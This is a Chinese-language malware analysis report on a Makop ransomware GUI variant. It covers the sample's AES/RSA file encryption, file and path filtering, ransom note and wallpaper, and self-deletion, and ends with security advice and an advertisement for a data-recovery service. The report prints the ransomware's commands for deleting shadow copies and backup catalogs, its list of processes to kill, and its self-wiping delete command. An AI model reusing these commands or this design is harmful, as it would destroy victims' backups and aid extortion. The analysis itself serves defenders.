  进入到format_ID_admin函数可以看到,先对前面检查启动权限的返回值来做了一下判断,如果是管理员权限,会将v1的值设为“admin”,如果不是管理员,v1的值将设为“not admin”。之后连带着前面生成的ID,一起格式化到“1. ID: %08X \n 2. %s”字符串中,来形成最后的内容。

  完成了格式化内容后,就需要该内容传入到编辑框中,然后待后续显示。

  这里会对byte_41A00Ebyte_40A00Dbyte_41A00F的值进行使用,将其设置成1012、1013和1015这几个checkbox的状态,如果为1则为选定状态,反之则为未被选定状态。

  获取系统版本,来进行判断,是否是Windows Visa下面的版本,如果是就调用ShowWindow函数来实现。

  激活系统热键CTRL+ALT+V来实现窗口的隐藏和显示

  获取当前计算机的名称,显示到ID为1011的编辑框中

  到此,所有的窗口内容的初始化就已经完成了。

4.1.7 执行加密(sub_406D70函数)

  执行流程图:

  开始分析:

  运行程序可以知道,当Start按钮被按下时,会触发加密等操作,而这部分内容也在DialogFunc回调函数中实现

  当a2等于0x111的时候,a3则变成了ID的值,通过switch case来实现触发各种控件事件,这里先找一下ID为1001的Start按钮的事件,找到如下内容。

  首先在按下Start按钮后,会先获取一下1014编辑框中的内容长度,如果获取到的内容长度为0的话,则代表未指定加密路径,直接开创一个线程,调用**sub_405690函数,**如果读取到内容,则将其作为参数,调用sub_405580函数。

  这里先进入sub_405690函数看一下实现,可以看到该函数主要就是个初始化函数,先调用sub_4033c0函数解密所用字符串和初始化对应结构以后,根据传入参数的值来进行判断选择部分执行内容,这里传入的值为2,故不执行第一个判断中的内容。

  在执行完上面的判断后,会调用sub_4076b0函数实现对系统版本的判断,如果系统版本大于windows visa或**windows server 2008(版本代表编号)**则开始执行加密流程。

  这里进入到start_enc函数看一下具体的实现,首先可以看到,该函数会先调用sub_4012C0函数实现了系统磁盘驱动器的遍历,然后将其信息初始化到结构体后,接着就是调用produce_random_key来产生两个key,最后调用sub_4015D0函数实现将刚才生成的key拼接上固定值ID卷****序列号等进行RSA加密(具体可以看密钥自加密实现部分),加密数据大小为128个字节。

  完成了上述的密钥生成和加密后,将调用sub_404BC0函数来实现UAC的虚拟化的开启,最后调用exec_del_shadow函数实现命令执行,之后调用close_server函数来实现指定服务的关闭等,这里实现看下面的描述中会细说。

  最后,在执行了前面的所有流程后,将执行文件的加密操作,调用**sub_401820函数,**开始加密当前目录

  进入到sub_401820函数可以看到,首先会调用sub_401720函数来对a1参数进行校验,如果不通过就不执行后面的,直接退出。

  这里进入到sub_401720函数看一下是如何校验的,从前面来看几乎就是一些赋值操作。

  后来才是比较部分,取当前路径的前8位和path_obj对象中的path的值进行比较,判断是否一样,如果不一样就返回0,如果一样就返回完整路径。

  因为这里我的路径不属于A-Z中任何一个盘,所以直接退出了,这里会继续向下,进入到sub_4019C0函数,开始遍历path_obj中的路径。

  进入到sub_4019C0函数中可以看到,首先会判断一下path_obj对象是否为空

  如果不为空,后面的实现其实sub_401820中的一样,二者唯一的不同就是前面的校验部分,一个是校验路径是否为本地的磁盘中的路径,一个是直接遍历本地磁盘。

  接下来就是开始解密所用字符串了,这里解密了**0xE0xF0x9这三个字符串,分别对应着0x400000x10chewbacca@cock.li****。**

  之后就是将加密所用的信息初始化到参数结构体中,然后拼接加密后缀,拼接后缀所用的格式为

   .[%08X].[%s].%s,其中三个参数为ID、勒索邮箱和加密文件后缀,例如:

[sspdlk00036@cock.li].mkp

  一切初始化完毕后,直接创建线程,调用StartAddress函数来实现对路径的遍历、过滤和加密等操作。

  这里进入到StartAddress函数,可以看到具体实现,主要的加密实现在sub_402210函数中。

  继续进入到sub_402210函数看一下实现。这里前面有一个sub_402030的部分没有说,因为该函数主要是个路径过滤函数,进入到sub_402210函数中还会再调用一次,所以就不再重复分析了。

  进入到sub_402030函数可以看到具体的过滤实现,主要过滤了这几个关键词:

windows
winnt

  之后就是下面的return的判断,主要过滤了以下关键词:

C:\Windows
C:\ProgramData\microsoft\windows\caches
C:\Users\All Users\Microsoft\Windows\Caches
Users\Public
C:\\ProgramData
C:\\Users

  完成了过滤后,就要开始遍历该路径下的文件夹和文件了,主要通过FindFirstFileW函数加通配符的方式实现该路径下所有文件的遍历

  开始校验,开始主要对文件名称做了简单校验,判断其开头是否为...的情况,并且文件名不得为空。

  之后就会开始调用check_filename函数,来实现文件名和文件后缀的校验。进入到check_filename函数可以看到具体实现,首先就是获取文件后缀

  校验文件的类型,判断是否是系统文件

  开始比较,如果遇到exedllSRC为文件后缀,则不加密,如果文件名为以下内容也不加密。

  过滤文件名:

boot.ini
bootfont.bin
ntldr
ntdetect.com
io.sys
+README-WARNING+.txt
desktop.ini

  在文件过滤完毕后,会判断文件大小是否小于等于0x4000字节大小,如果小于等于就将flag32的值设置为1

  反之为0

  接着会判断文件的属性是否为只读,如果文件属性是只读就将结构中flag33位置的值设置为1

  最后就要开始进行文件的加密操作,可以看到文件加密由encfile(sub_403C100)函数实现

  进入到enc_file函数可以看到具体实现,首先会对标志进行校验,然后将文件名给到v4,之后就是针对文件的只读属性进行处理,如果是待加密文件是只读文件,那么就将其权限修改为可读可写。

  打开文件的IO流

  调用check_file_last函数来检查一下文件末尾的标志是否存在,以判断是否是个正常的文件。

  进入到check_file_last函数可以看到具体实现,主要检查末尾四字节的内容是否是21592EF3(HEX),如果代表文件是加密的文件,就不需要进行加密,直接跳过。

  如果末尾4字节的标志不是21592EF3,那么就要进行加密。首先会根据文件的大小进行判断,如果大于0x40000字节的文件选择sub_4044E0函数进行加密,小于等于0x40000字节的文件选择sub_403EE0函数进行加密。这里的加密的详细,在文件加密板块来仔细分析。

  加密完成后,将对文件的名称进行修改,拼接上勒索后缀。

  最后调用MoveFileW函数实现文件名称的修改

  如果文件是只读文件,加密完毕后,会将文件属性再修改回去。

  全部的文件加密完成后,v35会进行自增,代表加密文件数量+1,然后开始读取该目录下的其他文件。

  当所有的文件读取完毕后,将进行勒索信的写入

  勒索信的写入主要实现函数为sub_408BC0函数,在写入完毕后就会关闭文件流。这里的勒索信的写入函数在勒索信写入部分会做详细分析。

  到此,大部分的加密流程就分析完毕。

4.1.8 磁盘遍历(sub_4012C0函数)

  调用SetErrorMode函数实现修改错误模式,让系统不显示错误对话框。

  获取系统物理磁盘,并且获取ID的值

  循环遍历A-Z,然后将存在的磁盘结构插入到a1参数对象中,这里的判断磁盘是否存在的依据是是否能获取到磁盘的卷序列号,如果能够获取到则继续,否则就下一个。

  这里在结构部分根据数据的类型,可以创建一个结构体,看的比较清晰。

  path_obj:

struct path_obj
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknow_felds;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
};

  遍历完毕之后,从内存中可以看到a1结构体对象的形式,分别为磁盘的数量和指向path_obj的指针。

  其中磁盘指针对应的两个path_obj

  对应的path_obj:

  到这里,系统磁盘的遍历就结束了。

4.1.9 密钥生成(produce_random_key函数)

  该函数的具体调用请看执行加密部分,这里主要介绍一下该函数的实现等。这里可以根据磁盘遍历部分的内容生成的结构体来看比较好便于理解。

  进入到密钥生成内部,可以看到这里会循环前面磁盘遍历结构体中所存的磁盘结构(path_obj)。先调用CryptAcquireContextW****函数初始化了一个加密对象,类型和前面加解密字符串用的一样,然后调用随机数生成器CryptGenRandom****函数生成了32位的随机字符串,当做加密所用的Key。

  但是这里会生成两个Key,方法其实一样。

  分别存储在对应的加密磁盘结构下的偏移32和偏移40的位置

  这里就可以重新修改一下path_obj的结构体了:

struct struct_v8
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknow_felds;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
  _DWORD first_produce_key;
  _DWORD first_produce_key_encdata;
  _DWORD second_produce_key;
  _DWORD second_produce_key_encdata;
};

  最后分析下来可以知道,一个磁盘对象path_obj分别对应着两个不同的key

4.1.10 密钥自加密(sub_4015D0函数)

  这里会先解密一个0x37标志对应的字符串dc21405d(hex形式),是一个固定值

  然后开始遍历所有的path_obj对象,将其中的信息提取出来,按照格式:

固定值 + ID + VolumeSerialNumber + DriveType + Key

  进行拼接后计算其CRC32,然后再将CRC32后的值拼接到末尾,组成一个完整的字符串,

固定值 + ID + VolumeSerialNumber + DriveType + Key + CRC32

  最后调用RSA_encode函数实现RSA的加密,构成一个128字节大小的密文。

  最后将RSA的加密结果放到path_objfirst_produce_key_encdatasecond_produce_key_encdata的对象中。

4.1.11 RSA加密(sub_402750函数)

  RSA加密其实很简单,进入到RSA_encode函数就能看到实现,其实整体就是通过CryptAcquireContextW初始化加密对象,然后CryptImportKey函数导入加密密钥,最后由CryptEncrypt函数实现加密,算法的识别也是一样,从该密钥的Blob结构就可以很清楚的看出是RSA类型的加密。

  其中RSA的公钥是由字符串解密标志0xa所解密的字符串,值为:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000

4.1.12 文件加密(sub_4044E0函数\sub_403EE0函数)

  这里sub_4004e0函数是文件大小大于0x40000字节大小的文件所采用的加密函数,sub_403ee0函数是文件大小小于等于0x40000字节大小的文件所采用的加密函数。

4.1.12.1 encrypto_big_file(sub_4044E0函数)

  进入到函数中,可以看到具体的实现。首先获取文件的大小,然后除3,将生成的值给到结构体的file_size_low变量中,再给到pdwDataLen。

  调用produce_random函数生成IV,这里就不再重复描述IV的生成过程,下面的那个encrypto_small_file函数中有做说明。

  生成了IV后,会根据flag的值,来选择使用第一个还是第二个密钥,这里因为flag为1,故选择第一个密钥,最后调用sub_402AC0函数将IV和KEY导入到加密对象中(这里的导入函数也不再重复描述)

  再导入完毕加密密钥和IV后,开始根据文件名的大小来计算结构大小,并且16字节对齐。

  之后就是将信息赋值给文件名称的结构体中,调用CryptoEncrypt函数对结构体内容进行加密。结构体的内容跟encrypto_small_file函数有所不同的是前三部分的padding部分,后面因为大致相同就没有再次创建一个结构体。

  结构:

min_size` +  `filesize / 3的值` +`0`+ `filesize` + `文件名长度` + `文件名`+ `前面所有信息的CRC32

  加密了文件名信息的结构体的内容后,会销毁加密对象,然后就是开始往文件的末尾写入数据。

  文件后缀写入完成后,将开始加密文件内容,先移动文件指针到文件内容的开头,然后调用sub_404400函数实现文件内容的加密操作。

  进入到sub_404400函数可以看到具体的加密实现,先读取min_size(0x40000)字节大小的数据,然后加密,最后写入到原文件中,整体就加密完毕了,使用的算法也是AES加密算法,加密模式依旧是CBC模式的。

  加密完成后,销毁加密对象,然后返回。

4.1.12.2 encrypto_small_file(sub_403EE0函数)

  进入到函数中,可以看到具体的实现。首先该函数会调用produce_random函数生成一个16位的随机数,当做IV。

  进入到produce_random函数可以看到IV的产生过程,先初始化了一下加密对象,类型为0x18

  调用SetFilePointerEx函数将文件指针移动到文件末尾,然后计算文件的大小,然后做16字节的对齐操作,不够的字节调用memset函数\x00字符写入到文件中补齐。

  根据path_obj中的flag的值来选择用第几个密钥,这里flag为1,故选择生成的第一个密钥,之后就是调用sub_402AC0函数将Key和IV导入到加密对象中。

  进入到sub_402AC0函数可以看到具体实现,就是很常规的利用CryptImportKey导入密钥。

  完成了加密对象的初始化后,这里先创建一个结构体,会比较好看

struct filename_struct
{
  _DWORD padding1;
  _DWORD padding2;
  _DWORD padding3;
  _DWORD file_size;
  _DWORD padding5;
  _DWORD filename_len;
  _DWORD file_name;
};

  这里会先对文件名称的大小+28字节后的大小进行16字节的对齐计算,这个28是什么看下面即可。

  得到了计算后的大小后,利用HeapAlloc函数创建指定大小的空间,用于存储上面的结构体。这里28就是结构体中,除了文件大小以外的信息所用的大小。之后还是很老的操作,将文件该结构体中的内容:00填充+文件大小+文件名称长度+文件名计算一下CRC32,然后将CRC32结果拼接到后面构成一个完整的数据,再调用enc_data函数将其加密。

  进入到enc_data函数可以很明显看到,就是个加密,用的IV和KEY都是刚才初始化加密对象所用的,故这里用了AES的加密算法,加密模式是CBC。

  将文件名等信息进行加密了以后,会销毁加密对象,然后将文件指针移动到文件末尾,将加密所用的配置信息写入到文件末尾,分别有加密文件大小、文件名称的加密数据、文件名称的加密数据长度和IV写入到文件末尾。

  之后继续写入密钥的加密数据、固定值和加密文件的标志。

  加密信息写入完毕后,调用sub_402AC0函数实现加密对象的KEY和IV的导入,判断已加密文件的大小是否大于等于文件大小,既判断是否加密完成,如果不等于就继续下面的加密,如果不等于就销毁加密对象,然后移动文件指针到文件末尾,在文件末尾写入8个FF字节。

  这里因为一开始加密,所以已加密文件的大小为0,故直接走下面的加密流程。

  开始移动文件指针到文件的开头,计算剩余加密大小,这里因为已经加密的大小为0,故剩余加密大小就是文件大小。最后判断一下如果剩余加密大小小于最小加密数据块(16字节),就将剩余加密大小设置为16字节,然后读取剩余加密大小的数据到read_buffer中。

  检查读取的数据大小是否符合16字节对齐,如果没有对齐,就用00字节补齐。

  开始调用enc_data函数read_buffer中的全部数据进行加密,并且移动文件指针到文件开头,写入全部的加密数据到文件中,最后更新已加密数据的大小。

  完成加密操作以后,对加密的字节大小进行校验,判断是否需要再次加密,如果已经加密的大小小于文件大小,代表还有内容未被加密,就继续循环加密,否则就结束加密。

  所有文件内容加密完成后,将销毁加密对象,然后在文件内容后追加写入8位FF字节。

  在文件内容中体现:

  加密完毕后,然后销毁加密对象,释放资源,最后返回。

4.1.13 勒索信写入(sub_408BC0函数)

  该函数会先解密所用字符串+README-WARNING+.txtYOUR_FILES_ARE_ENCRYPTED::: Greetings ::: (太多只展示部分勒索信内容)

  这里会判断是否指定勒索信的写入路径,如果指定了写入路径就调用write_random_note函数实现勒索信的写入

  这里进入到write_random_note函数可以看到具体的实现,会根据是否是管理员的权限,来选择是否要调用CreateDirectoryW函数来实现目录的创建,然后再调用wirte_ransom_note函数写入。

  这里进入到wirte_ransom_note函数来看一下具体的实现,基本上就是个简单的路径拼接,然后将勒索信内容写入到该路径中。

  在勒索信写入完毕后,将释放资源,然后返回。

4.1.14 勒索信壁纸替换(sub_4084E0函数)

  首先会获取设备上的屏幕信息

  然后根据屏幕的大小创建一个指定大小的画布,然后解密勒索壁纸所显示的信息。

  将勒索信息绘制到画布上,设置画布的背景颜色等

  获取临时目录的路径,创建临时文件,临时文件名拼接.bmp后缀形成临时图像文件,再将画布图像写入到该临时图像文件中

  调用SystemParametersInfoW函数,将壁纸路径修改为刚才创建的临时图像文件,实现壁纸的修改。

  完成了壁纸的替换后,释放资源等

  最后可以在temp目录下,可以找到这个文件。

4.1.15 系统影卷删除(exec_del_shadow函数)

  这个函数整体就比较简单,解密完了所用命令,然后送入shell_exec函数执行就结束了,执行的命令:

vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

4.1.16 停止指定服务(close_server函数)

  该函数也整体比较简单,首先解密一下所有指定的服务的可执行文件名,然后格式化到列表中。指定的服务可执行文件名:

sqlbrowser.exe
sqlwriter.exe
sqlservr.exe
msmdsrv.exe
MsDtsSrvr.exe
sqlceip.exe
fdlauncher.exe
Ssms.exe
sqlagent.exe
fdhost.exe
ReportingServicesService.exe
msftesql.exe
pg_ctl.exe
postgres.exe
UniFi.exe
armsvc.exe
IntelCpHDCPSvc.exe
OfficeClickToRun.exe
DellOSDService.exe
DymoPnpService.exe
Agent.exe
FJTWMKSV.exe
IPROSetMonitor.exe
IRMTService.exe
MBCloudEA.exe
QBCFMonitorService.exe
QBIDPService.exe
RstMwService.exe
TeamViewer_Service.exe
dasHost.exe
IntelCpHeciSvc.exe
RAVBg64.exe
vds.exe
unsecapp.exe
TodoBackupService.exe
MediaButtons.exe
IAStorDataMgrSvc.exe
jhi_service.exe
LMS.exe
DDVDataCollector.exe
DDVCollectorSvcApi.exe
TeamViewer.exe
tv_w32.exe
tv_x64.exe
Microsoft.Photos.exe
MicrosoftEdge.exe
ApplicationFrameHost.exe
browser_broker.exe
MicrosoftEdgeSH.exe
MicrosoftEdgeCP.exe
RtkNGUI64.exe
WavesSvc64.exe
OneDrive.exe
DYMO.DLS.Printing.Host.exe
FtLnSOP.exe
FjtwMkup.exe
FTPWREVT.exe
FTErGuid.exe
qbupdate.exe
QBWebConnector.exe
ShellExperienceHost.exe
RuntimeBroker.exe
IAStorIcon.exe
PrivacyIconClient.exe
SupportAssistAgent.exe
SecurityHealthService.exe
taskhostw.exe
taskhosta.exe
wijca.exe
ktfwswe.exe
HeciServer.exe
mdm.exe
ULCDRSvr.exe
WLIDSVC.EXE
WLIDSVCM.EXE
GoogleCrashHandler.exe
GoogleCrashHandler64.exe
RAVCpl64.exe
igfxtray.exe
hkcmd.exe
igfxpers.exe
PsiService_2.exe
UNS.exe
taskeng.exe
AdobeARM.exe
LenovoReg.exe
dwm.exe
wuauclt.exe
avp.exe
FBService.exe
LBAEvent.exe
PDFProFiltSrvPP.exe
avpsus.exe
klnagent.exe
vapm.exe
ScanToPCActivationApp.exe
BrStMonW.exe
BrCtrlCntr.exe
concentr.exe
redirector.exe
BrccMCtl.exe
BrYNSvc.exe
Receiver.exe
BrCcUxSys.exe
LSCNotify.exe
SelfServicePlugin.exe
wfcrun32.exe
HPNETW~1.EXE
HPScan.exe
taskhost.exe
Teams.exe
AuthManSvr.exe
WLXPhotoGallery.exe
outlook.exe
prevhost.exe
excel.exe
chrome.exe
AcroRd32.exe
RdrCEF.exe
vssadmin.exe
WmiPrvSE.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
agntsrvc.exe
mydesktopqos.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe

  然后开始调用Process32FirstW函数来遍历当前运行的所有进程,并且获取其中对应的可执行文件,用于后续的比对,如果一样就调用TerminateProcess函数结束该进程,如果不一样就调用Process32NextW函数遍历下一个。

4.1.17 自删除(sub_407890函数)

  通过读取环境变量ComSpec的值来获取cmd.exe的位置

  将获取到的cmd.exe的路径和自身可执行文件路径拼接到解密标志0x38解密后的字符串中,形成完整的命令:

C:/Windows/System32/cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 encode.exe & del /q /f encode.exe

    执行刚才的命令,实现对加密器的删除。

5. 病毒分析概览

  本次分析揭示了 Makop 勒索病毒家族最新GUI勒索程序的攻击手法和加密特征。该病毒主要使用 AES 和 RSA 结合的双重加密算法,以对文件加密并生成唯一标识符,同时更改文件扩展名.mkp。AES算法对文件内容进行快速加密,而 RSA 则用于加密 AES 密钥,使解密过程更具挑战性。

6.安全建议

1. 风险消减措施

  资产梳理排查目标: 根据实际情况,对内外网资产进行分时期排查

  服务方式: 调研访谈、现场勘查、工具扫描

  服务关键内容: 流量威胁监测系统排查、互联网暴露面扫描服务、技术加固服务、集权系统排查

2. 安全设备调优

目标

  通过对安全现状的梳理和分析,识别安全策略上的不足,结合目标防御、权限最小化、缩小攻击面等一系列参考原则,对设备的相关配置策略进行改进调优,一方面,减低无效或低效规则的出现频次;另一方面,对缺失或遗漏的规则进行补充,实现将安全设备防护能力最优化。

主要目标设备

  网络安全防护设备、系统防护软件、日志审计与分析设备、安全监测与入侵识别设备。

3. 全员安全意识增强调优

目标:

  通过网络安全意识宣贯、培训提升全方位安全能力

形式:

  培训及宣贯

线下培训课表

  若无法组织线下的集体培训,考虑两种方式:

    1.提供相关的安全意识培训材料,由上而下分发学习

    2.组织相关人员线上开会学习。线上培训模式。

线上学习平台

  以下是solar安全团队近期处理过的常见勒索病毒后缀:后缀.360勒索病毒,.halo勒索病毒,.phobos勒索病毒,.Lockfiles勒索病毒,.stesoj勒索病毒,.src勒索病毒,.svh勒索病毒,.Elbie勒索病毒,.Wormhole勒索病毒.live勒索病毒, .rmallox勒索病毒, .mallox 勒索病毒,.hmallox勒索病毒,.jopanaxye勒索病毒, .2700勒索病毒, .elbie勒索病毒, .mkp勒索病毒, .dura勒索病毒, .halo勒索病毒, .DevicData勒索病毒, .faust勒索病毒, ..locky勒索病毒, .cryptolocker勒索病毒, .cerber勒索病毒, .zepto勒索病毒, .wannacry勒索病毒, .cryptowall勒索病毒, .teslacrypt勒索病毒, .gandcrab勒索病毒, .dharma勒索病毒, .phobos勒索病毒, .lockergoga勒索病毒, .coot勒索病毒, .lockbit勒索病毒, .nemty勒索病毒, .contipa勒索病毒, .djvu勒索病毒, .marlboro勒索病毒, .stop勒索病毒, .etols勒索病毒, .makop勒索病毒, .mado勒索病毒, .skymap勒索病毒, .aleta勒索病毒, .btix勒索病毒, .varasto勒索病毒, .qewe勒索病毒, .mylob勒索病毒, .coharos勒索病毒, .kodc勒索病毒, .tro勒索病毒, .mbed勒索病毒, .wannaren勒索病毒, .babyk勒索病毒, .lockfiles勒索病毒, .locked勒索病毒, .DevicData-P-XXXXXXXX勒索病毒, .lockbit3.0勒索病毒, .blackbit勒索病毒等。

  勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。

  而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“solar专业应急响应团队”。

7.团队介绍

  团队坚持自主研发及创新,在攻防演练平台、网络安全竞赛平台、网络安全学习平台方面加大研发投入,目前已获得十几项专利及知识产权。团队也先后通过了ISO9001质量管理体系、ISO14000环境管理体系、ISO45001职业安全健康管理体系 、ITSS(信息技术服务运行维护标准四级)等认证,已构建了网络安全行业合格的资质体系;

8.我们的数据恢复服务流程

  多年的数据恢复处理经验,在不断对客户服务优化的过程中搭建了"免费售前+安心保障+专业恢复+安全防御"一体化的专业服务流程。

① 免费咨询/数据诊断分析

​   专业的售前技术顾问服务,免费在线咨询,可第一时间获取数据中毒后的正确处理措施,防范勒索病毒在内网进一步扩散或二次执行,避免错误操作导致数据无法恢复。

​   售前技术顾问沟通了解客户的机器中毒相关信息,结合团队数据恢复案例库的相同案例进行分析评估,初步诊断分析中毒数据的加密/损坏情况。

② 评估报价/数据恢复方案

​   您获取售前顾问的初步诊断评估信息后,若同意进行进一步深入的数据恢复诊断,我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。

​   专业数据恢复工程师根据数据检测分析结果,定制数据恢复方案(恢复价格/恢复率/恢复工期),并为您解答数据恢复方案的相关疑问。

③ 确认下单/签订合同

​   您清楚了解数据恢复方案后,您可自主选择以下下单方式:

  双方签署对公合同:根据中毒数据分析情况,量身定制输出数据恢复合同,合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款,双方合同签订,正式进入数据恢复专业施工阶段,数据恢复后进行验证确认,数据验证无误,交易完成。

④ 开始数据恢复专业施工

  安排专业数据恢复工程师团队全程服务,告知客户数据恢复过程注意事项及相关方案措施,并可根据客户需求及数据情况,可选择上门恢复/远程恢复。

  数据恢复过程中,团队随时向您报告数据恢复每一个节点工作进展(数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认)。

⑤ 数据验收/安全防御方案

  完成数据恢复后,我司将安排数据分析工程师进行二次检查确认数据恢复完整性,充分保障客户的数据恢复权益,二次检测确认后,通知客户进行数据验证。

  客户对数据进行数据验证完成后,我司将指导后续相关注意事项及安全防范措施,并可提供专业的企业安全防范建设方案及安全顾问服务,抵御勒索病毒再次入侵。

                      我们在此郑重承诺:

                     不成功不收费

                     全程一对一服务

                     365天不间断服务

                     免费提供安全方案

                     24h服务热线:

                     18894665383

                     17864099776

                     1829917331